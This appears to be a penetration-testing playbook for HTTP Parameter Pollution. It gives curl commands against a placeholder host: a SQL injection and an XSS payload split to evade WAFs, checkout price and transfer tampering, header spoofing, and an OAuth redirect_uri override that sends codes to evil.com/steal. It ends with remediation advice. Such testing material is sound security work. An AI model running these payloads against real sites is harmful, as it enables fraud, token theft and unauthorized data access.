| name | performing-http-parameter-pollution-attack |
| description | Execute HTTP Parameter Pollution attacks to bypass input validation, WAF rules, and security controls by injecting duplicate parameters that are processed differently by front-end and back-end systems. |
| domain | cybersecurity |
| subdomain | web-application-security |
| tags | ["http-parameter-pollution","hpp","waf-bypass","input-validation","web-security","parameter-injection","server-parsing"] |
| version | 1.0 |
| author | mahipal |
| license | Apache-2.0 |
Performing HTTP Parameter Pollution Attack
When to Use
- When testing web applications for input validation bypass vulnerabilities
- During WAF evasion testing to split attack payloads across duplicate parameters
- When assessing how different technology stacks handle duplicate HTTP parameters
- During API security testing to identify parameter precedence issues
- When testing OAuth or payment processing flows for parameter manipulation
Prerequisites
- Burp Suite Professional with Intruder and Repeater modules
- Understanding of HTTP protocol and query string parsing
- Knowledge of server-side parameter handling differences (first, last, array, concatenated)
- cURL or httpie for manual parameter crafting
- Target application technology stack identification (Apache, IIS, Tomcat, Node.js, etc.)
Workflow
Step 1 — Identify Parameter Handling Behavior
curl -v "http://target.com/search?q=first&q=second"
curl -X POST http://target.com/api/action \
-d "amount=100&amount=1"
Step 2 — Perform Server-Side HPP
curl "http://target.com/api/user?id=1%20OR%201%3D1"
curl "http://target.com/api/user?id=1%20OR&id=1%3D1"
curl -X POST http://target.com/transfer \
-d "to_account=victim&amount=100&to_account=attacker"
curl -X POST http://target.com/api/payment \
-d "price=99.99¤cy=USD&price=0.01"
Step 3 — Perform Client-Side HPP
curl "http://target.com/share?url=http://legit.com%26callback=http://evil.com"
curl "http://target.com/redirect?url=http://trusted.com%26token=stolen_value"
Step 4 — Bypass WAF Rules Using HPP
curl "http://target.com/search?q=1' UNION&q=SELECT password FROM users--"
curl "http://target.com/search?q=<script>&q=alert(1)</script>"
curl "http://target.com/api/data?filter=admin%26role=superadmin"
curl -H "X-Forwarded-For: 127.0.0.1" \
-H "X-Forwarded-For: attacker-ip" \
http://target.com/api/admin
Step 5 — Test OAuth and Payment Flow HPP
curl "http://target.com/oauth/authorize?client_id=legit&redirect_uri=https://legit.com/callback&redirect_uri=https://evil.com/steal"
curl -X POST http://target.com/api/checkout \
-d "item=product1&price=100&quantity=1&price=1"
curl -X POST http://target.com/api/apply-coupon \
-d "coupon=SAVE10&coupon=SAVE90&coupon=FREE"
Step 6 — Automate HPP Testing
zap-cli quick-scan --self-contained --start-options '-config api.disablekey=true' \
http://target.com
python3 hpp_tester.py --url http://target.com/api/action \
--params "id,role,amount" --method POST
Key Concepts
| Concept | Description |
|---|
| Server-Side HPP | Duplicate parameters processed differently by backend causing logic bypass |
| Client-Side HPP | Injected parameters reflected in URLs/links sent to other users |
| Parameter Precedence | Server behavior: first-wins, last-wins, concatenation, or array |
| WAF Evasion | Splitting attack payloads across duplicate parameters to avoid detection |
| Technology-Specific Parsing | Different frameworks handle duplicate parameters uniquely |
| URL Encoding HPP | Using %26 (encoded &) to inject additional parameters within a value |
| Header Pollution | Sending duplicate HTTP headers to exploit forwarding or trust logic |
Tools & Systems
| Tool | Purpose |
|---|
| Burp Suite | HTTP proxy for intercepting and duplicating parameters |
| param-miner | Burp extension for discovering hidden and duplicate parameters |
| OWASP ZAP | Automated scanner with HPP detection capabilities |
| Arjun | Hidden HTTP parameter discovery tool |
| ffuf | Fuzzing tool for parameter brute-forcing and duplication testing |
| Wfuzz | Web application fuzzer supporting parameter manipulation |
Common Scenarios
- WAF Bypass — Split SQL injection or XSS payloads across duplicate parameters where the WAF inspects values individually but the server concatenates them
- Payment Manipulation — Override price or quantity parameters in e-commerce checkout flows by submitting duplicate parameter values
- OAuth Redirect Hijacking — Inject a duplicate redirect_uri parameter to redirect authorization codes to an attacker-controlled server
- Access Control Bypass — Override role or permission parameters in requests to elevate privileges or access restricted resources
- Input Validation Bypass — Circumvent client-side or server-side validation by injecting unexpected duplicate parameters
Output Format
## HTTP Parameter Pollution Assessment Report
- **Target**: http://target.com
- **Server Technology**: ASP.NET/IIS (concatenation behavior)
- **Vulnerability**: Server-Side HPP in payment endpoint
### Parameter Handling Matrix
| Technology | Behavior | Tested |
|-----------|----------|--------|
| Apache/PHP | Last value | Yes |
| IIS/ASP.NET | Comma-concatenated | Yes |
| Node.js | Array | Yes |
### Findings
| # | Endpoint | Parameter | Impact | Severity |
|---|----------|-----------|--------|----------|
| 1 | POST /checkout | price | Price manipulation | Critical |
| 2 | GET /oauth/authorize | redirect_uri | Token theft | High |
| 3 | POST /api/search | q | WAF bypass (SQLi) | High |
### Remediation
- Implement strict parameter validation rejecting duplicate parameters
- Use the first occurrence of any parameter and ignore subsequent duplicates
- Apply WAF rules that detect duplicate parameter patterns
- Validate all parameters server-side regardless of client-side checks